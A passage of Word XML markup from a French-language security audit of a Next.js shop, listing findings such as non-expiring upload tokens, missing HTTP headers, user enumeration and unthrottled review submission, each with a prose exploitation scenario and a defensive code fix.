        <w:br/>
        <w:t xml:space="preserve">  return NextResponse.json({ error: 'Mot de passe incorrect' }, { status: 401 });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="B48700"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>M-03 — Token d'upload sans expiration ni usage unique</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/lib/uploadToken.ts (lignes 11–14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-613 — Insufficient Session Expiration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Le token d'upload est calculé comme HMAC(orderNumber, AUTH_SECRET). Il n'intègre aucune information temporelle : il est donc valide indéfiniment. Un lien d'upload partagé par email reste actif des mois ou des années après la commande. De plus, rien n'empêche de soumettre plusieurs fichiers avec le même token (absence de mécanisme one-time).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un client malveillant qui conserve son lien d'upload peut soumettre des fichiers volumineux ou malveillants à tout moment, même après la livraison de sa commande. Si le lien est intercepté (email compromis, cache proxy), l'attaquant dispose d'un accès permanent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Inclure un timestamp d'expiration dans le payload signé :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// uploadToken.ts</w:t>
        <w:br/>
        <w:t>const EXPIRY_SECONDS = 30 * 24 * 60 * 60; // 30 jours</w:t>
        <w:br/>
        <w:br/>
        <w:t>export async function signUploadToken(orderNumber: string, secret: string): Promise&lt;string&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const exp = Math.floor(Date.now() / 1000) + EXPIRY_SECONDS;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const payload = `${orderNumber}:${exp}`;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const key = await crypto.subtle.importKey('raw', enc(secret),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { name: 'HMAC', hash: 'SHA-256' }, false, ['sign']);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const sig = b64url(await crypto.subtle.sign('HMAC', key, enc(payload)));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return `${b64url(enc(String(exp)))}.${sig}`;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>export async function verifyUploadToken(orderNumber: string, token: string, secret: string): Promise&lt;boolean&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const [expB64, sig] = token.split('.');</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const exp = Number(new TextDecoder().decode(b64urlDecode(expB64)));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (exp &lt; Math.floor(Date.now() / 1000)) return false; // expiré</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const payload = `${orderNumber}:${exp}`;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const expected = await signUploadTokenRaw(payload, secret);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return expected === sig;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch { return false; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="B48700"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>M-04 — Absence d'en-têtes de sécurité HTTP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>next.config.ts (lignes —)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-693 — Protection Mechanism Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Aucun en-tête de sécurité HTTP n'est configuré : Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Strict-Transport-Security, Referrer-Policy, Permissions-Policy. Ces en-têtes constituent la première ligne de défense contre le clickjacking, le MIME sniffing, les injections de contenu et les fuites de données via le Referer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Sans X-Frame-Options / CSP frame-ancestors, le site peut être chargé dans une iframe par un attaquant pour une attaque de clickjacking : l'utilisateur croit cliquer sur son interface habituelle mais interagit en réalité avec un overlay malveillant. Sans CSP, une XSS potentielle peut exfiltrer des cookies ou des données de paiement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Ajouter les headers dans next.config.ts :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// next.config.ts</w:t>
        <w:br/>
        <w:t>async headers() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return [{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    source: '/(.*)',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    headers: [</w:t>
        <w:br/>
        <w:t xml:space="preserve">      { key: 'X-Frame-Options',           value: 'DENY' },</w:t>
        <w:br/>
        <w:t xml:space="preserve">      { key: 'X-Content-Type-Options',    value: 'nosniff' },</w:t>
        <w:br/>
        <w:t xml:space="preserve">      { key: 'Referrer-Policy',           value: 'strict-origin-when-cross-origin' },</w:t>
        <w:br/>
        <w:t xml:space="preserve">      { key: 'Permissions-Policy',        value: 'camera=(), microphone=(), geolocation=()' },</w:t>
        <w:br/>
        <w:t xml:space="preserve">      { key: 'Strict-Transport-Security', value: 'max-age=63072000; includeSubDomains; preload' },</w:t>
        <w:br/>
        <w:t xml:space="preserve">      { key: 'Content-Security-Policy',   value:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "default-src 'self'; script-src 'self' 'unsafe-inline'; " +</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "style-src 'self' 'unsafe-inline'; img-src 'self' data: blob:; " +</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "connect-src 'self' https://api.stripe.com; frame-ancestors 'none'" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }];</w:t>
        <w:br/>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1D5FA8"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>F-01 — Énumération d'utilisateurs via la réponse d'inscription</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/app/api/auth/register/route.ts (lignes 42–44)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-204 — Observable Response Discrepancy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>L'endpoint /api/auth/register retourne explicitement l'erreur "An account with this email already exists" (HTTP 409) lorsqu'un email est déjà enregistré. Cela permet à un attaquant de confirmer qu'une adresse email est associée à un compte, annulant la protection anti-énumération correctement implémentée dans /api/auth/login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un attaquant automatise des requêtes POST /api/auth/register avec une liste d'emails cibles (ex. adresses professionnelles d'une entreprise). Un 409 confirme que l'email est enregistré, un 201 indique qu'il ne l'est pas. Cette information peut être utilisée pour des attaques de phishing ciblées ou de credential stuffing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Retourner un 200 générique dans les deux cas, ou toujours renvoyer 201 sans distinguer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Au lieu de renvoyer 409 explicite :</w:t>
        <w:br/>
        <w:t>if (existing) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  // Réponse ambiguë — même code, même délai</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return NextResponse.json({ success: true }, { status: 201 });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1D5FA8"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>F-02 — Absence de limitation de débit sur la soumission d'avis</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/app/api/reviews/route.ts (lignes 33–64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-770 — Allocation of Resources Without Limits or Throttling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>L'endpoint POST /api/reviews n'a aucune limitation de débit ni validation que le productId correspond à un produit existant. N'importe qui peut soumettre un nombre illimité d'avis pour n'importe quel productId arbitraire, y compris des chaînes inconnues du catalogue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un attaquant peut automatiser des milliers de soumissions d'avis négatifs (1 étoile) ou de spam pour inonder les pages produit. Il peut également polluer la base D1 avec des entrées pour des product_id inexistants. Sans rate limiting, cette attaque est triviale et peu coûteuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Ajouter une validation du productId contre le catalogue et configurer un rate limiting Cloudflare sur /api/reviews (max 3 requêtes POST par IP par 10 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import { getProduct } from '@/lib/products-data';</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Dans POST(), après validation des champs :</w:t>
        <w:br/>
        <w:t>const product = getProduct(productId);</w:t>
        <w:br/>
        <w:t>if (!product) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return NextResponse.json({ error: 'Produit inconnu' }, { status: 404 });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1D5FA8"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>F-03 — Injection HTML dans l'email via le nom de fichier uploadé</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/app/api/upload/route.ts (lignes 62)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-79 — Improper Neutralization of Input (HTML Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
